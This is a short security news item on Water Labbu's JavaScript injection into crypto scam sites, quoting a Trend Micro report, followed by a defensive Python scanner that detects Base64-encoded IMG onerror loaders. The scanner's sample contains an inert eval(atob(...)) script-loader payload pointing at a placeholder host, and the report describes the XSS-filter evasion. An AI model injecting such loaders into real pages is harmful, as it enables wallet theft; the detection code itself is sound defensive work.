At least 45 scam websites have been compromised by Water Labbu, which has collected at least $316,728 in profits through an attack involving malicious JavaScript injection, according to a Trend Micro report.
“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the onerror event, in what is known as an XSS evasion technique, to bypass Cross-Site Scripting (XSS) filters. The injected payload then creates another script element that loads another script from the delivery server tmpmeta[.]com,” said Trend Micro.
Both Ethereum and TetherUSD addresses and balances are retrieved by the script as it scans wallets on the scam websites, with balances above 0.005 ETH or 22,000 USDT being targeted for exfiltration by Water Labbu.
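
A defender-side check for the IMG/onerror injection quoted above, as an added example that is not taken from the Trend Micro report: it parses a page, finds IMG tags whose onerror handler carries a Base64 literal, decodes it, and reports loader indicators and referenced hosts. The hint list, the 24-character threshold, and the sample HTML (which uses the reserved host cdn.example.test) are assumptions constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # assumed minimum length
LOADER_HINTS = ("createElement", "appendChild", ".src", "eval(", "atob(")
URL = re.compile(r"https?://[^\s'\"<>)]+")

def decode_candidates(handler):
    """Yield text decoded from Base64-looking literals inside a handler."""
    for literal in B64_LITERAL.findall(handler):
        try:
            padded = literal + "=" * (-len(literal) % 4)
            yield base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64, or not text once decoded

class OnerrorScanner(HTMLParser):
    """Collect <img> tags whose onerror handler hides a script loader."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        handler = dict(attrs).get("onerror") if tag == "img" else None
        if not handler:
            return
        layers = [handler, *decode_candidates(handler)]
        if len(layers) == 1:
            return  # plain handler with no encoded layer: not this pattern
        hints = sorted({h for t in layers for h in LOADER_HINTS if h in t})
        hosts = sorted({urlparse(u).hostname for t in layers for u in URL.findall(t)})
        if hints:
            self.findings.append({"line": self.getpos()[0], "hints": hints, "hosts": hosts})

def scan(html):
    scanner = OnerrorScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: an inert loader that points at a reserved .test host.
_INNER = "var s=document.createElement('script');s.src='https://cdn.example.test/loader.js';document.head.appendChild(s);"
SAMPLE = ('<p>wallet connect</p>\n'
          '<img src="logo.png" onerror="this.hidden=true">\n'
          '<img src=x onerror="eval(atob(\'%s\'))">\n'
          % base64.b64encode(_INNER.encode()).decode())

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Hosts recovered from the decoded layer can be compared against the delivery domains a report names, since the outer HTML never shows them in clear text.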